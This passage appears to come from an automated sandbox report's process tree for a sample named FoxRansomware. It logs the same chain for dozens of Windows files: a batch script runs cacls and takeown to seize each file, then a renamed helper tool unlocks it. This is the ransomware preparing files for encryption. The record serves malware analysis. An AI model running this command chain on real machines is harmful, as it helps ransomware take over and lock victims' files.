    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    3⤵
    PID:7228
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftLync2010.xml" -nobanner
      4⤵
      PID:6396
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  2⤵
  PID:5580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:7384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
    3⤵
    - Modifies file permissions
    PID:7316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    3⤵
    PID:6972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
      4⤵
      PID:7868
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  2⤵
  PID:3188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
    3⤵
    PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    3⤵
    PID:5208
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
      4⤵
      PID:5200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:5804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    PID:3176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:6156
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:5224
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.96fea20f-8ce3-4aa2-9117-b753618e2577.1.etl""
  2⤵
  PID:5480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.96fea20f-8ce3-4aa2-9117-b753618e2577.1.etl" /E /G Admin:F /C
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.96fea20f-8ce3-4aa2-9117-b753618e2577.1.etl"
    3⤵
    - Modifies file permissions
    PID:7120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "NotificationUxBroker.96fea20f-8ce3-4aa2-9117-b753618e2577.1.etl" -nobanner
    3⤵
    PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "NotificationUxBroker.96fea20f-8ce3-4aa2-9117-b753618e2577.1.etl" -nobanner
      4⤵
      PID:5900
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
  2⤵
  PID:9192
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
    3⤵
    - Modifies file permissions
    PID:6464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000G.bin" -nobanner
    3⤵
    PID:8864
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000G.bin" -nobanner
      4⤵
      PID:8824
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
  2⤵
  PID:5572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
    3⤵
    PID:6468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000R.bin" -nobanner
    3⤵
    PID:8792
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000R.bin" -nobanner
      4⤵
      PID:9120
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
  2⤵
  PID:6272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
    3⤵
    PID:8796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
    3⤵
    - Modifies file permissions
    PID:9116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000015.bin" -nobanner
    3⤵
    PID:6680
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000015.bin" -nobanner
      4⤵
      PID:7028
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""
  2⤵
  PID:4464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C
    3⤵
    PID:624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"
    3⤵
    - Modifies file permissions
    PID:5448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000006H.bin" -nobanner
    3⤵
    PID:7780
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000006H.bin" -nobanner
      4⤵
      PID:9080
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""
  2⤵
  PID:8108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"
    3⤵
    PID:3272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000075.bin" -nobanner
    3⤵
    PID:5836
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000075.bin" -nobanner
      4⤵
      PID:7188
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""
  2⤵
  PID:3008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C
    3⤵
    PID:6780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"
    3⤵
    PID:6628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000083.bin" -nobanner
    3⤵
    PID:9184
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000083.bin" -nobanner
      4⤵
      PID:4116
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""
  2⤵
  PID:6596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C
    3⤵
    PID:6544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"
    3⤵
    PID:8444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000009F.bin" -nobanner
    3⤵
    PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000009F.bin" -nobanner
      4⤵
      PID:6656
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""
  2⤵
  PID:8500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C
    3⤵
    PID:8996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"
    3⤵
    PID:6904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000AL.bin" -nobanner
    3⤵
    PID:8396
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000AL.bin" -nobanner
      4⤵
      PID:8512
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""
  2⤵
  PID:8776
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C
    3⤵
    PID:5576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"
    3⤵
    - Modifies file permissions
    PID:8632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000B1.bin" -nobanner
    3⤵
    PID:9028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000B1.bin" -nobanner
      4⤵
      PID:6952
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:8892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:8508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    PID:9056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:8580
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:8760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""
  2⤵
  PID:8672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C
    3⤵
    PID:8628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"
    3⤵
    PID:8708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000005.bin" -nobanner
    3⤵
    PID:3180
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000005.bin" -nobanner
      4⤵
      PID:8584
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""
  2⤵
  PID:9024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C
    3⤵
    PID:9016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"
    3⤵
    - Modifies file permissions
    PID:8932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000I.bin" -nobanner
    3⤵
    PID:7472
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000I.bin" -nobanner
      4⤵
      PID:4916
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""
  2⤵
  PID:2376
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C
    3⤵
    PID:7468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"
    3⤵
    - Modifies file permissions
    PID:7640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000000T.bin" -nobanner
    3⤵
    PID:8952
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000000T.bin" -nobanner
      4⤵
      PID:8956
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""
  2⤵
  PID:6260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"
    3⤵
    PID:7080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000017.bin" -nobanner
    3⤵
    PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000017.bin" -nobanner
      4⤵
      PID:4244
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:3840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:4036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:6268
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:5360
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:8472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:7356
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:7104
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""
  2⤵
  PID:8000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:7372
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6908
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  2⤵
  PID:5896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
    3⤵
    PID:8156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "DesktopSettings2013.xml" -nobanner
    3⤵
    PID:6292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "DesktopSettings2013.xml" -nobanner
      4⤵
      PID:5812
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  2⤵
  PID:6196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
    3⤵
    PID:8300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    3⤵
    PID:8392
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
      4⤵
      PID:4900
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  2⤵
  PID:384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
    3⤵
    - Modifies file permissions
    PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    3⤵
    PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
      4⤵
      PID:6380
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml""
  2⤵
  PID:7736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
    3⤵
